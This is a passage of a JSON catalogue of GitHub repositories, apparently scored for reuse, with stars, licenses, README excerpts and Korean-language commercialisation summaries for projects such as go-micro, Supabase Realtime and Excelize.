src=\"https://img.shields.io/badge/go.dev-reference-007d9c?logo=go&logoColor=white&style=flat-square\" alt=\"Documentation\"></a>\n  <a href=\"https://github.com/alexflint/go-arg/actions\"><img src=\"https://github.com/alexflint/go-arg/workflows/Go/badge.svg\" alt=\"Build Status\"></a>\n  <a href=\"https://codecov.io/gh/alexflint/go-arg\"><img src=\"https://codecov.io/gh/alexflint/go-arg/branch/master/graph/badge.svg\" alt=\"Coverage Status\"></a>\n  <a href=\"https://goreportcard.com/report/github.com/alexflint/go-arg\"><img src=\"https://goreportcard.com/badge/github.com/alexflint/go-arg\"","composite_score":0.1006,"license_safety_tag":"safe"},{"name":"heyFive-dev/Polymarket-Arbitrage-Trading-Bot-v2","github_url":"https://github.com/heyFive-dev/Polymarket-Arbitrage-Trading-Bot-v2","stars":256,"language":"TypeScript","license":"NOASSERTION","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.1006,"license_safety_tag":"unknown"},{"name":"FirebaseExtended/reactfire","github_url":"https://github.com/FirebaseExtended/reactfire","stars":6,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# FirebaseExtended/reactfire 분석 보고서\n\n## 왜 보물인가\n구글 파이어베이스 데이터베이스를 리액트(웹 개발 도구)에서 쉽게 연결해주는 도구로, 실시간 데이터를 다루는 웹 개발자들의 작업 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **협업 도구 SaaS**: 여러 사용자가 동시에 문서를 편집하고 실시간으로 변화","readme_excerpt":"# ReactFire\n\nHooks, Context Providers, and Components that make it easy to interact with\nFirebase.\n\n## What is ReactFire?\n\n- **Easy realtime updates for your function components** - Hooks\n  like `useUser`and `useFirestoreCollection` let you easily subscribe to\n  auth state, realtime data, and all other Firebase SDK events. Plus, they automatically unsubscribe when your component unmounts.\n- **Access Firebase libraries from any component** - Need the Firestore SDK? `useFirestore`. Remote Config? `useRemoteConfig`.\n- **Safely configure Firebase libraries** - Libraries like Firestore and Remote Config require settings like `enablePersistence` to be set before any data fetches are made. This can be tough to support in React's world of re-renders. ReactFire gives you `useInitFirestore` and `useInitRemoteConfig` hooks that guarantee they're set before anything else.\n\n## Install\n\n```bash\n# npm\nnpm install --save firebase reactfire\n\n# or\n\n# yarn\nyarn add firebase reactfire\n```\n\nDepending on yo","composite_score":0.1004,"license_safety_tag":"safe"},{"name":"asim/go-micro","github_url":"https://github.com/asim/go-micro","stars":5,"language":"Go","license":"Apache-2.0","abandonment_months":1,"description":"# asim/go-micro 프로젝트 분석\n\n## 왜 보물인가\n여러 컴퓨터를 하나로 연결하여 일하게 해주는 기술로, 대규모 온라인 서비스를 안정적으로 운영하려는 기업들에게 필수적입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 음악 스트리밍, 영상 호스팅 등 대량의 사용자를 처리해야 하는 플랫폼의 백엔드 구축\n- **내부 업무 도구**: 대기","readme_excerpt":"# Go Micro [![Go.Dev reference](https://img.shields.io/badge/go.dev-reference-007d9c?logo=go&logoColor=white&style=flat-square)](https://pkg.go.dev/go-micro.dev/v5?tab=doc) [![Go Report Card](https://goreportcard.com/badge/github.com/go-micro/go-micro)](https://goreportcard.com/report/github.com/go-micro/go-micro) \n\nGo Micro is a framework for distributed systems development.\n\n**[📖 Documentation](https://go-micro.dev/docs/)** | [Sponsored by Anthropic](https://go-micro.dev/blog/3)\n\n*️⃣ Try [**Micro**](https://micro.mu) - a new app platform by the creator of Go Micro\n\n## Overview\n\nGo Micro provides the core requirements for distributed systems development including RPC and Event driven communication.\nThe Go Micro philosophy is sane defaults with a pluggable architecture. We provide defaults to get you started quickly\nbut everything can be easily swapped out.\n\n## Features\n\nGo Micro abstracts away the details of distributed systems. Here are the main features.\n\n- **Authentication** - Auth","composite_score":0.1004,"license_safety_tag":"safe"},{"name":"radixdlt/scrypto-challenges","github_url":"https://github.com/radixdlt/scrypto-challenges","stars":67,"language":"Rust","license":"NOASSERTION","abandonment_months":5,"description":"","readme_excerpt":"","composite_score":0.1,"license_safety_tag":"unknown"},{"name":"doctrine/cache","github_url":"https://github.com/doctrine/cache","stars":7,"language":"PHP","license":"mit","abandonment_months":8,"description":"# Doctrine Cache 보물 분석\n\n## 왜 보물인가\n웹사이트나 앱이 느려지는 문제를 해결하는 '속도 부스터' 역할을 하는 기술로, 전 세계 수많은 대형 서비스들이 뒤에서 사용하고 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 전자상거래 플랫폼**\n상품 정보, 가격, 재고 정보를 빠르게 보여줄 수 있어서 고객 만족도를 높입니다.\n\n**2. 소셜 미","readme_excerpt":"# Doctrine Cache\n\n[![Build Status](https://github.com/doctrine/cache/workflows/Continuous%20Integration/badge.svg)](https://github.com/doctrine/cache/actions)\n[![Code Coverage](https://codecov.io/gh/doctrine/cache/branch/1.10.x/graph/badge.svg)](https://codecov.io/gh/doctrine/cache/branch/1.10.x)\n\n[![Latest Stable Version](https://img.shields.io/packagist/v/doctrine/cache.svg?style=flat-square)](https://packagist.org/packages/doctrine/cache)\n[![Total Downloads](https://img.shields.io/packagist/dt/doctrine/cache.svg?style=flat-square)](https://packagist.org/packages/doctrine/cache)\n\nCache component extracted from the Doctrine Common project. [Documentation](https://www.doctrine-project.org/projects/doctrine-cache/en/current/index.html)\n\nThis library is deprecated and will no longer receive bug fixes from the\nDoctrine Project. Please use a different cache library, preferably PSR-6 or\nPSR-16 instead.\n","composite_score":0.0999,"license_safety_tag":"safe"},{"name":"supabase/realtime","github_url":"https://github.com/supabase/realtime","stars":8,"language":"Elixir","license":"Apache-2.0","abandonment_months":0,"description":"# Supabase Realtime 분석 보고서\n\n## 왜 보물인가\n인터넷 연결만으로 여러 사람이 동시에 같은 데이터를 실시간으로 볼 수 있게 해주는 기술로, 현대적인 협업 도구와 라이브 서비스를 만드는 데 필수 기반입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 협업 업무 도구 SaaS**\n- 구글 독스처럼 팀원들이 동시에 문서를 편집하고 변화를 즉시 확인","readme_excerpt":"<br />\n<p align=\"center\">\n  <a href=\"https://supabase.io\">\n        <picture>\n      <source media=\"(prefers-color-scheme: dark)\" srcset=\"https://raw.githubusercontent.com/supabase/supabase/master/packages/common/assets/images/supabase-logo-wordmark--dark.svg\">\n      <source media=\"(prefers-color-scheme: light)\" srcset=\"https://raw.githubusercontent.com/supabase/supabase/master/packages/common/assets/images/supabase-logo-wordmark--light.svg\">\n      <img alt=\"Supabase Logo\" width=\"300\" src=\"https://raw.githubusercontent.com/supabase/supabase/master/packages/common/assets/images/logo-preview.jpg\">\n    </picture>\n  </a>\n\n  <h1 align=\"center\">Supabase Realtime</h1>\n\n  <p align=\"center\">\n    Send ephemeral messages, track and synchronize shared state, and listen to Postgres changes all over WebSockets.\n    <br />\n    <a href=\"https://supabase.com/docs/guides/realtime#examples\">Examples</a>\n    ·\n    <a href=\"https://github.com/orgs/supabase/discussions/new?category=feature-requests\">Request F","composite_score":0.0995,"license_safety_tag":"safe"},{"name":"micro/go-micro","github_url":"https://github.com/micro/go-micro","stars":6,"language":"Go","license":"apache-2.0","abandonment_months":1,"description":"# micro/go-micro 평가 분석\n\n## 왜 보물인가\n작은 규모 프로젝트들을 빠르게 연결하고 관리할 수 있는 기술로, 기업의 내부 시스템 구축 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 여러 기업의 데이터를 안전하게 분리하면서 하나의 플랫폼에서 관리하는 다중 고객 서비스\n- **내부 업무 도구**: 회사 ","readme_excerpt":"# Go Micro [![Go.Dev reference](https://img.shields.io/badge/go.dev-reference-007d9c?logo=go&logoColor=white&style=flat-square)](https://pkg.go.dev/go-micro.dev/v5?tab=doc) [![Go Report Card](https://goreportcard.com/badge/github.com/go-micro/go-micro)](https://goreportcard.com/report/github.com/go-micro/go-micro) \n\nGo Micro is a framework for distributed systems development.\n\n**[📖 Documentation](https://go-micro.dev/docs/)** | [Sponsored by Anthropic](https://go-micro.dev/blog/3)\n\n*️⃣ Try [**Micro**](https://micro.mu) - a new app platform by the creator of Go Micro\n\n## Overview\n\nGo Micro provides the core requirements for distributed systems development including RPC and Event driven communication.\nThe Go Micro philosophy is sane defaults with a pluggable architecture. We provide defaults to get you started quickly\nbut everything can be easily swapped out.\n\n## Features\n\nGo Micro abstracts away the details of distributed systems. Here are the main features.\n\n- **Authentication** - Auth","composite_score":0.0995,"license_safety_tag":"safe"},{"name":"Buzz2d0/Hyuga","github_url":"https://github.com/Buzz2d0/Hyuga","stars":6,"language":"Go","license":"GPL-3.0","abandonment_months":5,"description":"# Hyuga 저장소 분석\n\n## 왜 보물인가\n정확한 설명이 부족하여 프로젝트의 구체적인 가치를 판단하기 어렵지만, 6개의 관심도와 GPL-3.0 오픈소스 라이선스를 통해 공개 개발되고 있는 기술 도구로 보입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기술 전문가 커뮤니티 대상의 구독형 분석/모니터링 도구로 제공\n- **내부 업무 도구**","readme_excerpt":"<div align=\"center\" >\n    <img src=\"./docs/hyuga.png\" width=\"200\" alt=\"Hyuga\" />\n</div>\n<p align=\"center\">\n    <a href=\"https://github.com/ac0d3r/Hyuga\">\n        <img alt=\"Hyuga\" src=\"https://img.shields.io/badge/Hyuga-dev-yellow\"/>\n    </a>\n    <img src=\"https://img.shields.io/badge/Language-Golang-blue\" alt=\"Language\" />\n    <a href=\"https://github.com/ac0d3r/Hyuga/blob/master/LICENSE\">\n        <img alt=\"License\" src=\"https://img.shields.io/github/license/ac0d3r/Hyuga\"/>\n    </a>\n    <a href=\"https://github.com/ac0d3r/Hyuga/stargazers\">\n        <img alt=\"stars\" src=\"https://img.shields.io/github/stars/ac0d3r/Hyuga\"/>\n    </a>\n </p>\n\nHyuga 是一个用来监控带外(Out-of-Band)流量的工具。🪤\n\n## 🎉 项目简介\n\n项目地址：https://github.com/ac0d3r/Hyuga\n\n## 📷 预览\n<img width=\"1511\" alt=\"image\" src=\"https://user-images.githubusercontent.com/26270009/236437388-a862b25f-e049-420d-aaf8-b06e4aa66ccc.png\">\n\n## 🎉 功能\n\n### 🌀 oob\n- dns\n    - dns查询记录(query name, remote address)\n    - 支持 dns-rebinding [#🔗](#-dns-rebinding)\n- http \n   ","composite_score":0.0993,"license_safety_tag":"restricted"},{"name":"nikic/PHP-Parser","github_url":"https://github.com/nikic/PHP-Parser","stars":9,"language":"PHP","license":"bsd-3-clause","abandonment_months":3,"description":"# nikic/PHP-Parser 분석 보고서\n\n## 왜 보물인가\n웹사이트를 만드는 프로그래머들이 작성한 코드를 자동으로 읽고 분석할 수 있는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **코드 품질 검사 SaaS**: 개발자들이 작성한 코드의 문제점을 자동으로 찾아주는 웹 서비스로 운영\n2. **기업용 코드 감시 도구**: 대기업의 개발팀이 사내","readme_excerpt":"PHP Parser\n==========\n\n[![Coverage Status](https://coveralls.io/repos/github/nikic/PHP-Parser/badge.svg?branch=master)](https://coveralls.io/github/nikic/PHP-Parser?branch=master)\n\nThis is a PHP parser written in PHP. Its purpose is to simplify static code analysis and\nmanipulation.\n\n[**Documentation for version 5.x**][doc_master] (current; for running on PHP >= 7.4; for parsing PHP 7.0 to PHP 8.4, with limited support for parsing PHP 5.x).\n\n[Documentation for version 4.x][doc_4_x] (supported; for running on PHP >= 7.0; for parsing PHP 5.2 to PHP 8.3).\n\nFeatures\n--------\n\nThe main features provided by this library are:\n\n * Parsing PHP 7, and PHP 8 code into an abstract syntax tree (AST).\n   * Invalid code can be parsed into a partial AST.\n   * The AST contains accurate location information.\n * Dumping the AST in human-readable form.\n * Converting an AST back to PHP code.\n   * Formatting can be preserved for partially changed ASTs.\n * Infrastructure to traverse and modify ASTs.\n * Resol","composite_score":0.0992,"license_safety_tag":"safe"},{"name":"grpc/grpc-web","github_url":"https://github.com/grpc/grpc-web","stars":5,"language":"JavaScript","license":"apache-2.0","abandonment_months":4,"description":"# grpc/grpc-web 분석\n\n## 왜 보물인가\n웹 브라우저에서도 빠르고 효율적인 통신을 할 수 있게 해주는 구글의 공식 기술로, 현대적인 웹 애플리케이션 개발에 필수적인 인프라입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 실시간 협업 도구(피그마 같은 디자인 툴)에서 빠른 데이터 동기화\n- **내부 업무 도구**: 금융회사의 트레이","readme_excerpt":"# gRPC Web &middot; [![npm version](https://img.shields.io/npm/v/grpc-web.svg?style=flat)](https://www.npmjs.com/package/grpc-web)\n\nA JavaScript implementation of [gRPC][] for browser clients. For more information,\nincluding a **quick start**, see the [gRPC-web documentation][grpc-web-docs].\n\ngRPC-web clients connect to gRPC services via a special proxy; by default,\ngRPC-web uses [Envoy][].\n\nIn the future, we expect gRPC-web to be supported in language-specific web\nframeworks for languages such as Python, Java, and Node. For details, see the\n[roadmap](doc/roadmap.md).\n\n## Streaming Support\ngRPC-web currently supports 2 RPC modes:\n- Unary RPCs ([example](#make-a-unary-rpc-call))\n- Server-side Streaming RPCs ([example](#server-side-streaming)) (NOTE: Only when [`grpcwebtext`](#wire-format-mode) mode is used.)\n\nClient-side and Bi-directional streaming is not currently supported (see [streaming roadmap](doc/streaming-roadmap.md)).\n\n## Quick Start\n\nEager to get started? Try the [Hello World","composite_score":0.099,"license_safety_tag":"safe"},{"name":"rootzoll/raspiblitz","github_url":"https://github.com/rootzoll/raspiblitz","stars":5,"language":"","license":"MIT","abandonment_months":5,"description":"# RaspiBlitz 분석 보고서\n\n## 왜 보물인가\n일반인도 집에서 저렴한 라즈베리파이 컴퓨터로 비트코인 관련 금융 시스템을 직접 운영할 수 있게 해주는 오픈소스 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n\n1. **암호화폐 거래소 SaaS**: 개인 투자자들이 구독료를 내고 자신의 디지털 자산을 안전하게 관리하는 웹 서비스로 제공\n2. **비트코인 노","readme_excerpt":"# ![RaspiBlitz](pictures/raspilogo_tile_400px.png)\n\n_Build your own Bitcoin & Lightning Fullnode on a RaspberryPi with an optional Display._ ([API](https://github.com/fusion44/blitz_api)|[WebUI](https://github.com/raspiblitz/raspiblitz-web))\n\n![RaspiBlitz](pictures/raspiblitz.jpg)\n\n**The RaspiBlitz is a do-it-yourself Bitcoin & Lightning Fullnode running on a RaspberryPi 4&5 with a nice display for easy setup & monitoring.**\n\nRaspiBlitz is mainly targeted for learning how to run your own node decentralized from home - because: Not your Node, Not your Rules. Discover & develop the open-source ecosystem of Bitcoin by becoming a full part of it.\n\n**Links to Quickstart your RaspiBlitz journey:**\n\n- [Project Homepage: raspiblitz.org](https://raspiblitz.org)\n- [How to build & setup your own RaspiBlitz & Documentation](https://docs.raspiblitz.org/docs/setup/intro)\n- [Download latest SD Card images](https://docs.raspiblitz.org/docs/setup/software-setup/download)\n- [How to get Support](https://","composite_score":0.0989,"license_safety_tag":"safe"},{"name":"spring-cloud/spring-cloud-netflix","github_url":"https://github.com/spring-cloud/spring-cloud-netflix","stars":7,"language":"Java","license":"apache-2.0","abandonment_months":0,"description":"# Spring Cloud Netflix 분석\n\n## 왜 보물인가\n기업의 복잡한 온라인 서비스들을 안정적으로 연결하고 관리해주는 검증된 오픈소스 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 클라우드 기반 SaaS 서비스**\n- 여러 개의 마이크로서비스(작은 프로그램들)로 구성된 웹 애플리케이션에서 서비스 간 통신을 안정적으로 관리할 수 있습니다.\n\n*","readme_excerpt":"////\nDO NOT EDIT THIS FILE. IT WAS GENERATED.\nManual changes to this file will be lost when it is generated again.\nEdit the files in the src/main/asciidoc/ directory instead.\n////\n\n\n\nimage::https://github.com/spring-cloud/spring-cloud-netflix/actions/workflows/maven.yml/badge.svg?branch=main&style=svg[\"Build\",link=\"https://github.com/spring-cloud/spring-cloud-netflix/actions/workflows/maven.yml\"]\n\nimage:https://codecov.io/gh/spring-cloud/spring-cloud-netflix/branch/main/graph/badge.svg[\"Codecov\", link=\"https://app.codecov.io/gh/spring-cloud/spring-cloud-netflix/tree/main\"]\n\n\n[[features]]\n== Features\n\n* Service Discovery: Eureka instances can be registered and clients can discover the instances using Spring-managed beans\n* Service Discovery: an embedded Eureka server can be created with declarative Java configuration\n\n\n[[building]]\n== Building\n\n:jdkversion: 17\n\n[[basic-compile-and-test]]\n== Basic Compile and Test\n\nTo build the source you will need to install JDK {jdkversion}.\n\nSpring Cl","composite_score":0.0987,"license_safety_tag":"safe"},{"name":"lindell/JsBarcode","github_url":"https://github.com/lindell/JsBarcode","stars":5,"language":"JavaScript","license":"mit","abandonment_months":5,"description":"# JsBarcode 상용화 분석 보고서\n\n## 왜 보물인가\n웹사이트나 앱에서 쉽게 바코드를 만들 수 있는 기술로, 유통·물류·소매 업체들이 필수적으로 필요한 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 소상공인 POS 시스템에 바코드 생성 기능을 탑재한 구독형 서비스 (월 $29~99)\n2. **내부 업무 도구**: 대형 ","readme_excerpt":"<p align=\"center\">\n\t<a href=\"http://lindell.me/JsBarcode\"><img src=\"http://lindell.me/JsBarcode/other/logo.svg\" alt=\"JsBarcode\"/></a>\n\t<br><br>\n\t<a href=\"http://travis-ci.org/lindell/JsBarcode\"><img src=\"https://secure.travis-ci.org/lindell/JsBarcode.svg\" alt=\"Build Status\"/></a>\n\t<a href=\"https://scrutinizer-ci.com/g/lindell/JsBarcode/?branch=master\"><img src=\"https://scrutinizer-ci.com/g/lindell/JsBarcode/badges/quality-score.png?b=master\" alt=\"Scrutinizer Code Quality\"/></a>\n\t<a href=\"https://www.jsdelivr.com/package/npm/jsbarcode\"><img src=\"https://data.jsdelivr.com/v1/package/npm/jsbarcode/badge?style=rounded\" alt=\"CDN\"></a>\n\t<a href=\"https://github.com/lindell/JsBarcode/blob/master/MIT-LICENSE.txt\"><img src=\"https://img.shields.io/badge/license-MIT-blue.svg\" alt=\"License\"/></a>\n</p>\n\nIntroduction\n----\n**JsBarcode** is a **barcode generator** written in JavaScript. It supports multiple barcode formats and works in browsers and with *Node.js*. It has *no dependencies* when it is us","composite_score":0.0986,"license_safety_tag":"safe"},{"name":"yannbf/ionic3-components","github_url":"https://github.com/yannbf/ionic3-components","stars":5,"language":"TypeScript","license":"mit","abandonment_months":6,"description":"# yannbf/ionic3-components 평가 분석\n\n## 왜 보물인가\n휴대폰 앱 개발 시 자주 사용되는 미리 만들어진 화면 구성 요소들을 모아놓은 라이브러리로, 개발자들이 처음부터 다시 만들 필요 없이 바로 가져다 쓸 수 있어 개발 시간을 크게 단축시킵니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 휴대폰 앱 기반의 프로젝트 관리","readme_excerpt":"# Ionic Advanced Components [![Open Source Love](https://badges.frapsoft.com/os/v1/open-source.svg?v=103)](https://github.com/ellerbrock/open-source-badge/)\n\n[![All Contributors](https://img.shields.io/badge/all_contributors-15-orange.svg?style=flat-square)](#contributors)\n\n## This project uses Ionic 3 and Angular 5\nThere are currently no plans to update this project to the latest Ionic and Angular as the effort is quite big. If you are interested in doing so, contributions are appreciated!\n\n## Demo\n\nIf you just want to check this project out, you can see the online demo at https://yannbf.github.io/ionic3-components.\n\nPlease note that some plugins may **only work** when using a real device, so don't expect everything to work in the browser.\n\n---\n\nThis repository was made in order to help people learn and speed up their development process.\nYou will find many many different components, pages, pipes, services, of which can be very useful to you. Note though that these are all experimenta","composite_score":0.0985,"license_safety_tag":"safe"},{"name":"FezVrasta/popper.js","github_url":"https://github.com/FezVrasta/popper.js","stars":10,"language":"TypeScript","license":"mit","abandonment_months":3,"description":"# Popper.js 저장소 분석\n\n## 왜 보물인가\n웹사이트에서 팝업, 툴팁, 드롭다운 메뉴 같은 작은 창들을 정확한 위치에 자동으로 배치해주는 필수 기술로, 현대 웹서비스 대부분이 사용하고 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 대시보드 서비스**: 사용자 가이드 팝업, 설정 메뉴, 알림창 등을 올바른 위치에 표시하는 기능\n- **전자상거","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://github.com/floating-ui/floating-ui/blob/master/website/assets/floating-ui-banner.png\" alt=\"Floating UI\" width=\"70%\">\n<p>\n\n> [!NOTE]\n> Popper is now Floating UI! For Popper v2, visit\n> [its dedicated branch](https://github.com/floating-ui/floating-ui/tree/v2.x) and [its documentation](https://popper.js.org/docs).\n> For help on migrating, check out the\n> [Migration Guide.](https://floating-ui.com/docs/migration)\n\n[Floating UI](https://floating-ui.com) is a small library that helps you create\n\"floating\" elements such as tooltips, popovers, dropdowns, and more.\n\nIt offers two main features:\n\n1. **Anchor positioning**: Anchor a floating element (such as a tooltip) to\n   another element (such as a button) while simultaneously ensuring it stays in\n   view as best as possible by avoiding collisions. This feature is available\n   for all platforms.\n2. **User interactions for React**: Hooks and components for composing\n   interactions to create accessible fl","composite_score":0.0985,"license_safety_tag":"safe"},{"name":"360EntSecGroup-Skylar/excelize","github_url":"https://github.com/360EntSecGroup-Skylar/excelize","stars":8,"language":"Go","license":"BSD-3-Clause","abandonment_months":0,"description":"# Excelize 저장소 분석\n\n## 왜 보물인가\n엑셀 파일을 자동으로 만들고 편집할 수 있는 도구로, 회계·통계·보고서 작업을 수동에서 자동화로 바꿀 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 급여 관리 시스템에서 월급 명세서를 엑셀로 자동 생성하는 기능\n2. **내부 업무 도구**: 대기업의 재무팀이 월간 결","readme_excerpt":"<p align=\"center\"><img width=\"650\" src=\"./excelize.svg\" alt=\"Excelize logo\"></p>\n\n<p align=\"center\">\n    <a href=\"https://github.com/xuri/excelize/actions/workflows/go.yml\"><img src=\"https://github.com/xuri/excelize/actions/workflows/go.yml/badge.svg\" alt=\"Build Status\"></a>\n    <a href=\"https://codecov.io/gh/qax-os/excelize\"><img src=\"https://codecov.io/gh/qax-os/excelize/branch/master/graph/badge.svg\" alt=\"Code Coverage\"></a>\n    <a href=\"https://goreportcard.com/report/github.com/xuri/excelize/v2\"><img src=\"https://goreportcard.com/badge/github.com/xuri/excelize/v2\" alt=\"Go Report Card\"></a>\n    <a href=\"https://pkg.go.dev/github.com/xuri/excelize/v2\"><img src=\"https://img.shields.io/badge/go.dev-reference-007d9c?logo=go&logoColor=white\" alt=\"go.dev\"></a>\n    <a href=\"https://opensource.org/licenses/BSD-3-Clause\"><img src=\"https://img.shields.io/badge/license-bsd-orange.svg\" alt=\"Licenses\"></a>\n    <a href=\"https://www.paypal.com/paypalme/xuri\"><img src=\"https://img.shields.io/badge","composite_score":0.0985,"license_safety_tag":"safe"},{"name":"protocolbuffers/protobuf-go","github_url":"https://github.com/protocolbuffers/protobuf-go","stars":5,"language":"Go","license":"bsd-3-clause","abandonment_months":4,"description":"# protocolbuffers/protobuf-go 분석\n\n## 왜 보물인가\nGoogle이 개발한 데이터 통신 표준으로, 전 세계 기업들이 서버 간 정보 교환에 필수로 사용하는 핵심 인프라 기술입니다.\n\n## 어디에 쓸 수 있나\n- **클라우드 서비스 개발**: 마이크로소프트, 아마존 같은 대형 클라우드 기업들이 서버 간 빠른 통신을 위해 필수 사용\n- ","readme_excerpt":"# Go support for Protocol Buffers\n\n[![Go Reference](https://pkg.go.dev/badge/google.golang.org/protobuf.svg)](https://pkg.go.dev/google.golang.org/protobuf)\n[![Build Status](https://travis-ci.org/protocolbuffers/protobuf-go.svg?branch=master)](https://travis-ci.org/protocolbuffers/protobuf-go)\n\nThis project hosts the Go implementation for\n[protocol buffers](https://protobuf.dev), which is a\nlanguage-neutral, platform-neutral, extensible mechanism for serializing\nstructured data. The protocol buffer language is a language for specifying the\nschema for structured data. This schema is compiled into language specific\nbindings. This project provides both a tool to generate Go code for the\nprotocol buffer language, and also the runtime implementation to handle\nserialization of messages in Go. See the\n[protocol buffer developer guide](https://protobuf.dev/overview)\nfor more information about protocol buffers themselves.\n\nThis project is comprised of two components:\n\n*   Code generator: The\n  ","composite_score":0.0984,"license_safety_tag":"safe"},{"name":"henrylee2cn/pholcus","github_url":"https://github.com/henrylee2cn/pholcus","stars":7,"language":"Go","license":"apache-2.0","abandonment_months":3,"description":"# Pholcus 저장소 분석\n\n## 왜 보물인가\n웹사이트에서 자동으로 데이터를 수집하는 오픈소스 도구로, 수작업으로 하던 정보 수집을 빠르고 효율적으로 처리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **시장 조사 SaaS**: 경쟁사 가격, 상품 정보를 자동으로 모니터링하는 구독형 서비스\n2. **부동산 중개사 내부 도구**: 주택 가격, 임대료 ","readme_excerpt":"<div align=\"center\">\r\n  <img src=\"https://github.com/andeya/pholcus/raw/master/doc/icon.png\" width=\"120\" alt=\"Pholcus Logo\"/>\r\n  <h1>Pholcus（幽灵蛛）</h1>\r\n  <p><strong>纯 Go 语言编写的分布式高并发爬虫框架</strong></p>\r\n\r\n[![GitHub release](https://img.shields.io/github/release/andeya/pholcus.svg?style=flat-square)](https://github.com/andeya/pholcus/releases)\r\n[![GitHub stars](https://img.shields.io/github/stars/andeya/pholcus.svg?style=flat-square&label=Stars)](https://github.com/andeya/pholcus/stargazers)\r\n[![Go Reference](https://pkg.go.dev/badge/github.com/andeya/pholcus.svg)](https://pkg.go.dev/github.com/andeya/pholcus)\r\n[![Go Report Card](https://goreportcard.com/badge/github.com/andeya/pholcus?style=flat-square)](https://goreportcard.com/report/andeya/pholcus)\r\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg?style=flat-square)](https://github.com/andeya/pholcus/blob/master/LICENSE)\r\n[![GitHub issues](https://img.shields.io/github/issues/andeya/pholcus.svg?style=flat-square)]","composite_score":0.0984,"license_safety_tag":"safe"},{"name":"jerairrest/react-chartjs-2","github_url":"https://github.com/jerairrest/react-chartjs-2","stars":5,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# react-chartjs-2 분석 보고서\n\n## 왜 보물인가\n웹사이트나 앱에서 판매량, 방문자 수 등의 데이터를 시각적인 그래프로 보여주는 도구로, 복잡한 숫자를 한눈에 이해하기 쉽게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 구독 분석 플랫폼에서 고객의 매출 현황과 성장률을 실시간 차트로 표시\n- **내부 업무 도구**: 회","readme_excerpt":"# react-chartjs-2\n\n<img align=\"right\" width=\"150\" height=\"150\" alt=\"Logo\" src=\"website/static/img/logo.svg\">\n\nReact components for <a href=\"https://www.chartjs.org\">Chart.js</a>, the most popular charting library.\n\nSupports Chart.js v4 and v3.\n\n[![NPM version][npm]][npm-url]\n[![Downloads][downloads]][downloads-url]\n[![Build status][build]][build-url]\n[![Coverage status][coverage]][coverage-url]\n[![Bundle size][size]][size-url]\n\n[npm]: https://img.shields.io/npm/v/react-chartjs-2.svg\n[npm-url]: https://www.npmjs.com/package/react-chartjs-2\n\n[downloads]: https://img.shields.io/npm/dm/react-chartjs-2.svg\n[downloads-url]: https://www.npmjs.com/package/react-chartjs-2\n\n[build]: https://img.shields.io/github/actions/workflow/status/reactchartjs/react-chartjs-2/ci.yml?branch=master\n[build-url]: https://github.com/reactchartjs/react-chartjs-2/actions\n\n[coverage]: https://img.shields.io/codecov/c/github/reactchartjs/react-chartjs-2.svg\n[coverage-url]: https://app.codecov.io/gh/reactchartjs/reac","composite_score":0.0982,"license_safety_tag":"safe"},{"name":"Cog-Creators/Red-DiscordBot","github_url":"https://github.com/Cog-Creators/Red-DiscordBot","stars":8,"language":"Python","license":"gpl-3.0","abandonment_months":0,"description":"# Red-DiscordBot 상용화 분석\n\n## 왜 보물인가\n누구나 쉽게 Discord(채팅 앱) 봇을 만들고 확장할 수 있는 오픈소스 플랫폼으로, 커뮤니티 기반 자동화 도구 시장에서 차별화된 가치를 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **커뮤니티 관리 SaaS**: Discord 서버 운영자를 위한 자동 모더레이션, 회원 관리, 통계 분석 등의","readme_excerpt":"<h1 align=\"center\">\n  <br>\n  <a href=\"https://github.com/Cog-Creators/Red-DiscordBot/tree/V3/develop\"><img src=\"https://imgur.com/pY1WUFX.png\" alt=\"Red - Discord Bot\"></a>\n  <br>\n  Red Discord Bot\n  <br>\n</h1>\n\n<h4 align=\"center\">Music, Moderation, Trivia, Stream Alerts and Fully Modular.</h4>\n\n<p align=\"center\">\n  <a href=\"https://discord.gg/red\">\n    <img src=\"https://discordapp.com/api/guilds/133049272517001216/widget.png?style=shield\" alt=\"Discord Server\">\n  </a>\n  <a href=\"https://pypi.org/project/Red-DiscordBot/\">\n     <img alt=\"PyPI\" src=\"https://img.shields.io/pypi/v/Red-Discordbot\">\n  </a>\n  <a href=\"https://www.python.org/downloads/\">\n    <img alt=\"PyPI - Python Version\" src=\"https://img.shields.io/pypi/pyversions/Red-Discordbot\">\n  </a>\n  <a href=\"https://github.com/Rapptz/discord.py/\">\n     <img src=\"https://img.shields.io/badge/discord-py-blue.svg\" alt=\"discord.py\">\n  </a>\n  <a href=\"https://www.patreon.com/Red_Devs\">\n    <img src=\"https://img.shields.io/badge/Support-Red!","composite_score":0.0981,"license_safety_tag":"restricted"},{"name":"ncase/trust","github_url":"https://github.com/ncase/trust","stars":5,"language":"JavaScript","license":"cc0-1.0","abandonment_months":5,"description":"# ncase/trust 저장소 분석\n\n## 왜 보물인가\n신뢰 관계를 시각적으로 이해하고 분석할 수 있는 도구로, 사람들 간의 복잡한 신뢰 네트워크를 게임처럼 배우고 경험할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **교육 플랫폼**: 심리학, 경제학 강의에서 신뢰의 중요성을 대학생들이 직접 체험하도록 제공\n2. **기업 내부 도구**: 팀 빌딩 